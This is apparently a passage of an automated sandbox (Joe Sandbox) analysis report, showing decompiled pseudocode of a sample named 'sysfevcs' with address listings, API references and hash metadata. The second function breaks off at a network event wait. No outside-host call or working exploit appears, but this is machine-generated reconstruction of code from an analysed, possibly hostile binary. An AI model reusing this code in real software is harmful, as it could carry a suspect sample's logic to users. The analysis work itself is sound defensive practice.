                                                                                                                                                                                                                                                                  									_t62 = _a4;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								__eflags = _t62;
                                                                                                                                                                                                                                                                  								if(_t62 == 0) {
                                                                                                                                                                                                                                                                  									L59:
                                                                                                                                                                                                                                                                  									_t63 = _t104;
                                                                                                                                                                                                                                                                  									goto L60;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									__eflags = _v12 - 0x1000000;
                                                                                                                                                                                                                                                                  									if(_v12 != 0x1000000) {
                                                                                                                                                                                                                                                                  										goto L59;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                                                                                                                  									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                                                                                                                  										L46:
                                                                                                                                                                                                                                                                  										_t63 = 1;
                                                                                                                                                                                                                                                                  										 *0x414238 = 1;
                                                                                                                                                                                                                                                                  										__eflags =  *0x414238;
                                                                                                                                                                                                                                                                  										if( *0x414238 != 0) {
                                                                                                                                                                                                                                                                  											goto L60;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										_t84 =  *0x4141f0; // 0x0
                                                                                                                                                                                                                                                                  										__eflags = _t84;
                                                                                                                                                                                                                                                                  										_t93 = _t84;
                                                                                                                                                                                                                                                                  										if(_t84 <= 0) {
                                                                                                                                                                                                                                                                  											L51:
                                                                                                                                                                                                                                                                  											__eflags = _t93;
                                                                                                                                                                                                                                                                  											if(_t93 != 0) {
                                                                                                                                                                                                                                                                  												L58:
                                                                                                                                                                                                                                                                  												 *0x414238 = 0;
                                                                                                                                                                                                                                                                  												goto L5;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  											_t77 = 0xf;
                                                                                                                                                                                                                                                                  											__eflags = _t84 - _t77;
                                                                                                                                                                                                                                                                  											if(_t84 <= _t77) {
                                                                                                                                                                                                                                                                  												_t77 = _t84;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  											_t94 = 0;
                                                                                                                                                                                                                                                                  											__eflags = _t77;
                                                                                                                                                                                                                                                                  											if(_t77 < 0) {
                                                                                                                                                                                                                                                                  												L56:
                                                                                                                                                                                                                                                                  												__eflags = _t84 - 0x10;
                                                                                                                                                                                                                                                                  												if(_t84 < 0x10) {
                                                                                                                                                                                                                                                                  													_t86 = _t84 + 1;
                                                                                                                                                                                                                                                                  													__eflags = _t86;
                                                                                                                                                                                                                                                                  													 *0x4141f0 = _t86;
                                                                                                                                                                                                                                                                  												}
                                                                                                                                                                                                                                                                  												goto L58;
                                                                                                                                                                                                                                                                  											} else {
                                                                                                                                                                                                                                                                  												do {
                                                                                                                                                                                                                                                                  													_t68 = 0x4141f8 + _t94 * 4;
                                                                                                                                                                                                                                                                  													_t94 = _t94 + 1;
                                                                                                                                                                                                                                                                  													__eflags = _t94 - _t77;
                                                                                                                                                                                                                                                                  													 *_t68 = _t110;
                                                                                                                                                                                                                                                                  													_t110 =  *_t68;
                                                                                                                                                                                                                                                                  												} while (_t94 <= _t77);
                                                                                                                                                                                                                                                                  												goto L56;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										_t69 = 0x4141f4 + _t84 * 4;
                                                                                                                                                                                                                                                                  										while(1) {
                                                                                                                                                                                                                                                                  											__eflags =  *_t69 - _t110;
                                                                                                                                                                                                                                                                  											if( *_t69 == _t110) {
                                                                                                                                                                                                                                                                  												goto L51;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  											_t93 = _t93 - 1;
                                                                                                                                                                                                                                                                  											_t69 = _t69 - 4;
                                                                                                                                                                                                                                                                  											__eflags = _t93;
                                                                                                                                                                                                                                                                  											if(_t93 > 0) {
                                                                                                                                                                                                                                                                  												continue;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  											goto L51;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L51;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_t87 = _v32;
                                                                                                                                                                                                                                                                  									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                                                                                                                  									if( *_t87 != 0x5a4d) {
                                                                                                                                                                                                                                                                  										goto L59;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                                                                                                                  									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                                                                                                                  									if( *_t71 != 0x4550) {
                                                                                                                                                                                                                                                                  										goto L59;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                                                                                                                  									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                                                                                                                  										goto L59;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_t78 = _t76 - _t87;
                                                                                                                                                                                                                                                                  									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                                                                                                                  									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                                                                                                                  									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                                                                                                                  										goto L59;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                                                                                                                  									__eflags = _t78 - _t72;
                                                                                                                                                                                                                                                                  									if(_t78 < _t72) {
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                                                                                                                  									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                                                                                                                  									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                                                                                                                  										goto L20;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									goto L46;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								goto L16;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							while(1) {
                                                                                                                                                                                                                                                                  								L16:
                                                                                                                                                                                                                                                                  								__eflags =  *((intOrPtr*)(0x4141f8 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                                  								if( *((intOrPtr*)(0x4141f8 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                                  									break;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_t58 = _t58 + 1;
                                                                                                                                                                                                                                                                  								__eflags = _t58 - _t81;
                                                                                                                                                                                                                                                                  								if(_t58 < _t81) {
                                                                                                                                                                                                                                                                  									continue;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								goto L18;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							__eflags = _t58;
                                                                                                                                                                                                                                                                  							if(_t58 <= 0) {
                                                                                                                                                                                                                                                                  								goto L5;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							 *0x414238 = 1;
                                                                                                                                                                                                                                                                  							__eflags =  *0x414238;
                                                                                                                                                                                                                                                                  							if( *0x414238 != 0) {
                                                                                                                                                                                                                                                                  								goto L5;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							__eflags =  *((intOrPtr*)(0x4141f8 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                                  							if( *((intOrPtr*)(0x4141f8 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                                  								L32:
                                                                                                                                                                                                                                                                  								_t100 = 0;
                                                                                                                                                                                                                                                                  								__eflags = _t58;
                                                                                                                                                                                                                                                                  								if(_t58 < 0) {
                                                                                                                                                                                                                                                                  									L34:
                                                                                                                                                                                                                                                                  									 *0x414238 = 0;
                                                                                                                                                                                                                                                                  									goto L5;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									goto L33;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								do {
                                                                                                                                                                                                                                                                  									L33:
                                                                                                                                                                                                                                                                  									_t90 = 0x4141f8 + _t100 * 4;
                                                                                                                                                                                                                                                                  									_t100 = _t100 + 1;
                                                                                                                                                                                                                                                                  									__eflags = _t100 - _t58;
                                                                                                                                                                                                                                                                  									 *_t90 = _t110;
                                                                                                                                                                                                                                                                  									_t110 =  *_t90;
                                                                                                                                                                                                                                                                  								} while (_t100 <= _t58);
                                                                                                                                                                                                                                                                  								goto L34;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_t25 = _t81 - 1; // -1
                                                                                                                                                                                                                                                                  							_t58 = _t25;
                                                                                                                                                                                                                                                                  							__eflags = _t58;
                                                                                                                                                                                                                                                                  							if(_t58 < 0) {
                                                                                                                                                                                                                                                                  								L28:
                                                                                                                                                                                                                                                                  								__eflags = _t81 - 0x10;
                                                                                                                                                                                                                                                                  								if(_t81 < 0x10) {
                                                                                                                                                                                                                                                                  									_t81 = _t81 + 1;
                                                                                                                                                                                                                                                                  									__eflags = _t81;
                                                                                                                                                                                                                                                                  									 *0x4141f0 = _t81;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_t28 = _t81 - 1; // 0x0
                                                                                                                                                                                                                                                                  								_t58 = _t28;
                                                                                                                                                                                                                                                                  								goto L32;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								goto L25;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							while(1) {
                                                                                                                                                                                                                                                                  								L25:
                                                                                                                                                                                                                                                                  								__eflags =  *((intOrPtr*)(0x4141f8 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                                  								if( *((intOrPtr*)(0x4141f8 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                                  									break;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_t58 = _t58 - 1;
                                                                                                                                                                                                                                                                  								__eflags = _t58;
                                                                                                                                                                                                                                                                  								if(_t58 >= 0) {
                                                                                                                                                                                                                                                                  									continue;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							__eflags = _t58;
                                                                                                                                                                                                                                                                  							if(__eflags >= 0) {
                                                                                                                                                                                                                                                                  								if(__eflags == 0) {
                                                                                                                                                                                                                                                                  									goto L34;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								goto L32;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							goto L28;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                                                                                                                  						__eflags = _t75 - _v8;
                                                                                                                                                                                                                                                                  						if(_t75 < _v8) {
                                                                                                                                                                                                                                                                  							goto L20;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						__eflags = _t75 - _t108;
                                                                                                                                                                                                                                                                  						if(_t75 >= _t108) {
                                                                                                                                                                                                                                                                  							goto L20;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L15;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					L5:
                                                                                                                                                                                                                                                                  					_t63 = 1;
                                                                                                                                                                                                                                                                  					goto L60;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					goto L3;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}




































                                                                                                                                                                                                                                                                  0x0040ec57
                                                                                                                                                                                                                                                                  0x0040ec5a
                                                                                                                                                                                                                                                                  0x0040ec60
                                                                                                                                                                                                                                                                  0x0040ec7e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ec7e
                                                                                                                                                                                                                                                                  0x0040ec68
                                                                                                                                                                                                                                                                  0x0040ec71
                                                                                                                                                                                                                                                                  0x0040ec77
                                                                                                                                                                                                                                                                  0x0040ec86
                                                                                                                                                                                                                                                                  0x0040ec89
                                                                                                                                                                                                                                                                  0x0040ec8c
                                                                                                                                                                                                                                                                  0x0040ec96
                                                                                                                                                                                                                                                                  0x0040ec96
                                                                                                                                                                                                                                                                  0x0040ec98
                                                                                                                                                                                                                                                                  0x0040ec9b
                                                                                                                                                                                                                                                                  0x0040ec9d
                                                                                                                                                                                                                                                                  0x0040ec9d
                                                                                                                                                                                                                                                                  0x0040ec9f
                                                                                                                                                                                                                                                                  0x0040eca2
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040eca4
                                                                                                                                                                                                                                                                  0x0040eca6
                                                                                                                                                                                                                                                                  0x0040ed0c
                                                                                                                                                                                                                                                                  0x0040ed0c
                                                                                                                                                                                                                                                                  0x0040ee6a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ee6a
                                                                                                                                                                                                                                                                  0x0040eca8
                                                                                                                                                                                                                                                                  0x0040eca8
                                                                                                                                                                                                                                                                  0x0040ecac
                                                                                                                                                                                                                                                                  0x0040ecae
                                                                                                                                                                                                                                                                  0x0040ecae
                                                                                                                                                                                                                                                                  0x0040ecae
                                                                                                                                                                                                                                                                  0x0040ecae
                                                                                                                                                                                                                                                                  0x0040ecb1
                                                                                                                                                                                                                                                                  0x0040ecb2
                                                                                                                                                                                                                                                                  0x0040ecb5
                                                                                                                                                                                                                                                                  0x0040ecb5
                                                                                                                                                                                                                                                                  0x0040ecb9
                                                                                                                                                                                                                                                                  0x0040ecbd
                                                                                                                                                                                                                                                                  0x0040eccb
                                                                                                                                                                                                                                                                  0x0040eccb
                                                                                                                                                                                                                                                                  0x0040ecd3
                                                                                                                                                                                                                                                                  0x0040ecd9
                                                                                                                                                                                                                                                                  0x0040ecdb
                                                                                                                                                                                                                                                                  0x0040ecdd
                                                                                                                                                                                                                                                                  0x0040eced
                                                                                                                                                                                                                                                                  0x0040ecfa
                                                                                                                                                                                                                                                                  0x0040ecfe
                                                                                                                                                                                                                                                                  0x0040ed03
                                                                                                                                                                                                                                                                  0x0040ed05
                                                                                                                                                                                                                                                                  0x0040ed83
                                                                                                                                                                                                                                                                  0x0040ed83
                                                                                                                                                                                                                                                                  0x0040ed07
                                                                                                                                                                                                                                                                  0x0040ed07
                                                                                                                                                                                                                                                                  0x0040ed07
                                                                                                                                                                                                                                                                  0x0040ed85
                                                                                                                                                                                                                                                                  0x0040ed87
                                                                                                                                                                                                                                                                  0x0040ee68
                                                                                                                                                                                                                                                                  0x0040ee68
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed8d
                                                                                                                                                                                                                                                                  0x0040ed8d
                                                                                                                                                                                                                                                                  0x0040ed94
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed9a
                                                                                                                                                                                                                                                                  0x0040ed9e
                                                                                                                                                                                                                                                                  0x0040edfa
                                                                                                                                                                                                                                                                  0x0040edfc
                                                                                                                                                                                                                                                                  0x0040ee04
                                                                                                                                                                                                                                                                  0x0040ee06
                                                                                                                                                                                                                                                                  0x0040ee08
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ee0a
                                                                                                                                                                                                                                                                  0x0040ee10
                                                                                                                                                                                                                                                                  0x0040ee12
                                                                                                                                                                                                                                                                  0x0040ee14
                                                                                                                                                                                                                                                                  0x0040ee29
                                                                                                                                                                                                                                                                  0x0040ee29
                                                                                                                                                                                                                                                                  0x0040ee2b
                                                                                                                                                                                                                                                                  0x0040ee5a
                                                                                                                                                                                                                                                                  0x0040ee61
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ee61
                                                                                                                                                                                                                                                                  0x0040ee2f
                                                                                                                                                                                                                                                                  0x0040ee30
                                                                                                                                                                                                                                                                  0x0040ee32
                                                                                                                                                                                                                                                                  0x0040ee34
                                                                                                                                                                                                                                                                  0x0040ee34
                                                                                                                                                                                                                                                                  0x0040ee36
                                                                                                                                                                                                                                                                  0x0040ee38
                                                                                                                                                                                                                                                                  0x0040ee3a
                                                                                                                                                                                                                                                                  0x0040ee4e
                                                                                                                                                                                                                                                                  0x0040ee4e
                                                                                                                                                                                                                                                                  0x0040ee51
                                                                                                                                                                                                                                                                  0x0040ee53
                                                                                                                                                                                                                                                                  0x0040ee53
                                                                                                                                                                                                                                                                  0x0040ee54
                                                                                                                                                                                                                                                                  0x0040ee54
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ee3c
                                                                                                                                                                                                                                                                  0x0040ee3c
                                                                                                                                                                                                                                                                  0x0040ee3c
                                                                                                                                                                                                                                                                  0x0040ee45
                                                                                                                                                                                                                                                                  0x0040ee46
                                                                                                                                                                                                                                                                  0x0040ee48
                                                                                                                                                                                                                                                                  0x0040ee4a
                                                                                                                                                                                                                                                                  0x0040ee4a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ee3c
                                                                                                                                                                                                                                                                  0x0040ee3a
                                                                                                                                                                                                                                                                  0x0040ee16
                                                                                                                                                                                                                                                                  0x0040ee1d
                                                                                                                                                                                                                                                                  0x0040ee1d
                                                                                                                                                                                                                                                                  0x0040ee1f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ee21
                                                                                                                                                                                                                                                                  0x0040ee22
                                                                                                                                                                                                                                                                  0x0040ee25
                                                                                                                                                                                                                                                                  0x0040ee27
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ee27
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ee1d
                                                                                                                                                                                                                                                                  0x0040eda0
                                                                                                                                                                                                                                                                  0x0040eda3
                                                                                                                                                                                                                                                                  0x0040eda8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040edb1
                                                                                                                                                                                                                                                                  0x0040edb3
                                                                                                                                                                                                                                                                  0x0040edb9
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040edbf
                                                                                                                                                                                                                                                                  0x0040edc5
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040edcb
                                                                                                                                                                                                                                                                  0x0040edcd
                                                                                                                                                                                                                                                                  0x0040edd6
                                                                                                                                                                                                                                                                  0x0040edda
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ede0
                                                                                                                                                                                                                                                                  0x0040ede3
                                                                                                                                                                                                                                                                  0x0040ede5
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040edec
                                                                                                                                                                                                                                                                  0x0040edee
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040edf0
                                                                                                                                                                                                                                                                  0x0040edf4
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040edf4
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ecdf
                                                                                                                                                                                                                                                                  0x0040ecdf
                                                                                                                                                                                                                                                                  0x0040ecdf
                                                                                                                                                                                                                                                                  0x0040ece6
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ece8
                                                                                                                                                                                                                                                                  0x0040ece9
                                                                                                                                                                                                                                                                  0x0040eceb
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040eceb
                                                                                                                                                                                                                                                                  0x0040ed13
                                                                                                                                                                                                                                                                  0x0040ed15
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed25
                                                                                                                                                                                                                                                                  0x0040ed27
                                                                                                                                                                                                                                                                  0x0040ed29
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed2f
                                                                                                                                                                                                                                                                  0x0040ed36
                                                                                                                                                                                                                                                                  0x0040ed62
                                                                                                                                                                                                                                                                  0x0040ed62
                                                                                                                                                                                                                                                                  0x0040ed64
                                                                                                                                                                                                                                                                  0x0040ed66
                                                                                                                                                                                                                                                                  0x0040ed7a
                                                                                                                                                                                                                                                                  0x0040ed7c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed68
                                                                                                                                                                                                                                                                  0x0040ed68
                                                                                                                                                                                                                                                                  0x0040ed68
                                                                                                                                                                                                                                                                  0x0040ed71
                                                                                                                                                                                                                                                                  0x0040ed72
                                                                                                                                                                                                                                                                  0x0040ed74
                                                                                                                                                                                                                                                                  0x0040ed76
                                                                                                                                                                                                                                                                  0x0040ed76
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed68
                                                                                                                                                                                                                                                                  0x0040ed38
                                                                                                                                                                                                                                                                  0x0040ed38
                                                                                                                                                                                                                                                                  0x0040ed3b
                                                                                                                                                                                                                                                                  0x0040ed3d
                                                                                                                                                                                                                                                                  0x0040ed4f
                                                                                                                                                                                                                                                                  0x0040ed4f
                                                                                                                                                                                                                                                                  0x0040ed52
                                                                                                                                                                                                                                                                  0x0040ed54
                                                                                                                                                                                                                                                                  0x0040ed54
                                                                                                                                                                                                                                                                  0x0040ed55
                                                                                                                                                                                                                                                                  0x0040ed55
                                                                                                                                                                                                                                                                  0x0040ed5b
                                                                                                                                                                                                                                                                  0x0040ed5b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed3f
                                                                                                                                                                                                                                                                  0x0040ed3f
                                                                                                                                                                                                                                                                  0x0040ed3f
                                                                                                                                                                                                                                                                  0x0040ed46
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed48
                                                                                                                                                                                                                                                                  0x0040ed48
                                                                                                                                                                                                                                                                  0x0040ed49
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed49
                                                                                                                                                                                                                                                                  0x0040ed4b
                                                                                                                                                                                                                                                                  0x0040ed4d
                                                                                                                                                                                                                                                                  0x0040ed60
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed60
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed4d
                                                                                                                                                                                                                                                                  0x0040ecbf
                                                                                                                                                                                                                                                                  0x0040ecc2
                                                                                                                                                                                                                                                                  0x0040ecc5
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ecc7
                                                                                                                                                                                                                                                                  0x0040ecc9
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ecc9
                                                                                                                                                                                                                                                                  0x0040ec8e
                                                                                                                                                                                                                                                                  0x0040ec90
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 0040ECFE
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MemoryQueryVirtual
                                                                                                                                                                                                                                                                  • String ID: 8BA$8BA$8BA
                                                                                                                                                                                                                                                                  • API String ID: 2850889275-2911327915
                                                                                                                                                                                                                                                                  • Opcode ID: 1fc1e9e51b8d3a755360d72960d4b34ea433d7ab73e8c8e3fbb0d1fce81ebb19
                                                                                                                                                                                                                                                                  • Instruction ID: 53aac2a77a9f56d9b5b49871b8f1364076886e856ea69bd72e3e10827216548d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fc1e9e51b8d3a755360d72960d4b34ea433d7ab73e8c8e3fbb0d1fce81ebb19
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F861DA31600606DFEB29CF2BC98466673A1EF95354B248D7BD806E72D1E339DC92C69C
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                                                                                                                  			E0040E120(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                  				intOrPtr _v64;
                                                                                                                                                                                                                                                                  				char _v68;
                                                                                                                                                                                                                                                                  				long _v72;
                                                                                                                                                                                                                                                                  				signed char _v80;
                                                                                                                                                                                                                                                                  				long _v92;
                                                                                                                                                                                                                                                                  				char _v96;
                                                                                                                                                                                                                                                                  				char _v100;
                                                                                                                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                                                                                                                  				void* __edi;
                                                                                                                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                                                                                                                  				long _t31;
                                                                                                                                                                                                                                                                  				long _t33;
                                                                                                                                                                                                                                                                  				long _t34;
                                                                                                                                                                                                                                                                  				long _t42;
                                                                                                                                                                                                                                                                  				intOrPtr _t49;
                                                                                                                                                                                                                                                                  				intOrPtr* _t56;
                                                                                                                                                                                                                                                                  				intOrPtr _t70;
                                                                                                                                                                                                                                                                  				intOrPtr* _t73;
                                                                                                                                                                                                                                                                  				long _t74;
                                                                                                                                                                                                                                                                  				intOrPtr _t75;
                                                                                                                                                                                                                                                                  				struct _CRITICAL_SECTION* _t76;
                                                                                                                                                                                                                                                                  				intOrPtr* _t77;
                                                                                                                                                                                                                                                                  				void* _t78;
                                                                                                                                                                                                                                                                  				signed int _t79;
                                                                                                                                                                                                                                                                  				void* _t81;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t81 = (_t79 & 0xfffffff8) - 0x44;
                                                                                                                                                                                                                                                                  				_t31 = GetTickCount();
                                                                                                                                                                                                                                                                  				_t56 = _a4;
                                                                                                                                                                                                                                                                  				_v72 = _t31;
                                                                                                                                                                                                                                                                  				_t33 = WaitForSingleObject( *(_t56 + 0x10), 1);
                                                                                                                                                                                                                                                                  				if(_t33 == 0) {
                                                                                                                                                                                                                                                                  					L25:
                                                                                                                                                                                                                                                                  					return _t33;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					goto L1;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				do {
                                                                                                                                                                                                                                                                  					L1:
                                                                                                                                                                                                                                                                  					_t73 = _t56 + 0x18;
                                                                                                                                                                                                                                                                  					__imp__WSAWaitForMultipleEvents(1, _t73, 0, 0, 0);
                                                                                                                                                                                                                                                                  					if(_t33 != 0x102) {
